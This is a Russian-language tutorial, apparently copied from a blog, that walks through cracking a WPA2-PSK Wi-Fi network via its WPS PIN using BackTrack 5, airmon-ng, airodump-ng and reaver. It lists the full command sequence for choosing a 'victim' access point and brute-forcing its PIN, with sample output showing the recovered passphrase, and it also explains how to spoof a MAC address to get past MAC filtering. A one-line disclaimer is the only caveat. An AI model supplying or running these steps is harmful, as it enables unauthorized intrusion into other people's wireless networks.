Все описанное будем проделывать в Ubuntu, либо можно использвать дистрибутив
Back track 5 , в репозиториях которого уже есть нужный софт. А для Ubuntu подключить репозитории BackTrack:
Для Ubuntu.
$ sudo gedit /etc/apt/sources.list
Добавим в конец файла следующее:
# Repository Backtrack
deb http://all.repository.backtrack-linux.org
deb http://all.repository.backtrack-linux.org revolution main microverse non-free testing
deb http://32.repository.backtrack-linux.org revolution main microverse non-free testing
deb http://source.repository.backtrack-linux.org revolution main microverse non-free testing
Экспортируем ключ безопастности репозитория:
$ wget -q http://all.repository.backtrack-linux.org/backtrack.gpg -O- | sudo apt-key add -
И обновим списки пакетов:
$ sudo apt-get update
Ставим пакеты:
$ sudo apt-get install aircrack-ng reaver.
Для windows
Качаем дистрибутив
Back track 5. Если не знаем что такое торрент то взломать точно не выйдет)).
Находим флешку от 8 гб или dvd-r или rw диск.
Для записи флешки нам понадобиться програмка
Uniwersal USB Instaler
Скачиваем, запускаем
Выбераем Backtrack 5 r3
Вставляем наш образ.
Выбераем нашу флешку.
Нажимаем Create.
Ждем окончания процесса. Готово.
На диск записать можно даже стандартным прожигом оброзов от windows в 7.
Не буду вдаваться в подробности.
Перезагружаем и выбераем запуск с носителя где записан Backtrack
Ждем пока всё не прогрузиться если загрузка в какой то момент встала. Пишем startx.
После загрузки рабочего стола открываем консоль.
Взлом WPS:
Так как взломать Wi-Fi сеть WPA2-PSK ?
Переведем нашу карту в monitor mode
Код:
$ sudo airmon-ng start wlan0
Должно быть примерное так:
Код:
Interface Chipset Driver wlan0 Ralink 2561 PCI rt61pci - [phy0] (monitor mode enabled on mon0)
Теперь найдем жертву
Код:
$ sudo airodump-ng mon0
Будет список доступных сетей:
Остоновить поиск Ctrl+c
Код:
CH 5 ][ Elapsed: 12 s ][ 2012-05-17 16:45 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 1C:BD:B9:B5:C6:B9 -58 6 0 0 2 54 WPA2 TKIP PSK iformula.ru 193.240 BSSID STATION PWR Rate Lost Packets Probes
Проверим, включен ли WPS на точке
Начинаем перебор:
Код:
$ sudo reaver -i mon0 -b 1C:BD:B9:B5:C6:B9 -a -vv
Где mon0 - имя виртуального интерфейса, далее мак адресс точки. -а - автоматически определять параметры взлома. -vv - диагностические сообщения
В результате пошел перебор пинов:
Reaver v1.4 WiFi Protected Setup Attack Tool Copyright (c) 2011, Tactical Network Solutions, Craig Heffner cheffner@tacnetsol.com
[+] Waiting for beacon from 1C:BD:B9:B5:C6:B9
[+] Switching mon0 to channel 1
[+] Switching mon0 to channel 2
[+] Associated with 1C:BD:B9:B5:C6:B9 (ESSID: iformula.ru 193.240)
[+] Trying pin 12345670
В конечном итоге :
[+] WPS PIN: '80369424'
[+] WPA PSK: 'TryT0H4CkMe'
[+] AP SSID: 'iformula.ru 193.240'
видим как взлом Wi-Fi сети WPA2 успешно заверен.
Особо любознательные могут усовершенствовать перебор и сократить его время, изучив все возможности reaver:
$ reaver -h
Возможные проблемы:
- не появляется mon0 интерфейс: карточка или драйвер не поддерживают monitor mode
- В лог сыпятся строки [!] WARNING: Receive timeout occured: какая то проблема с wi-fi картой, причину я не смог найти, просто использовал другой адаптер.
- В логе [!] WARNING : Fialed to associate with XX:XX:XX:XX:XX:XX (ESSID: d-link) : на точке включена фильтрация по мак адресам. нужно сниферить нужный мак и ставить его себе. (airodump-ng)
Дополнительно:
Данный материал предназначен только в целях научного интереса и восстановления своего забытого пароля. Соблюдайте законодательство РФ.
Если ещё есть какие то вопросы то пишем обращаемся. Писал на скорую руку в будущем добавлю картинки и возможно видеоинструкцию.
Матерьял взят с сайта http://blogzadrota.ru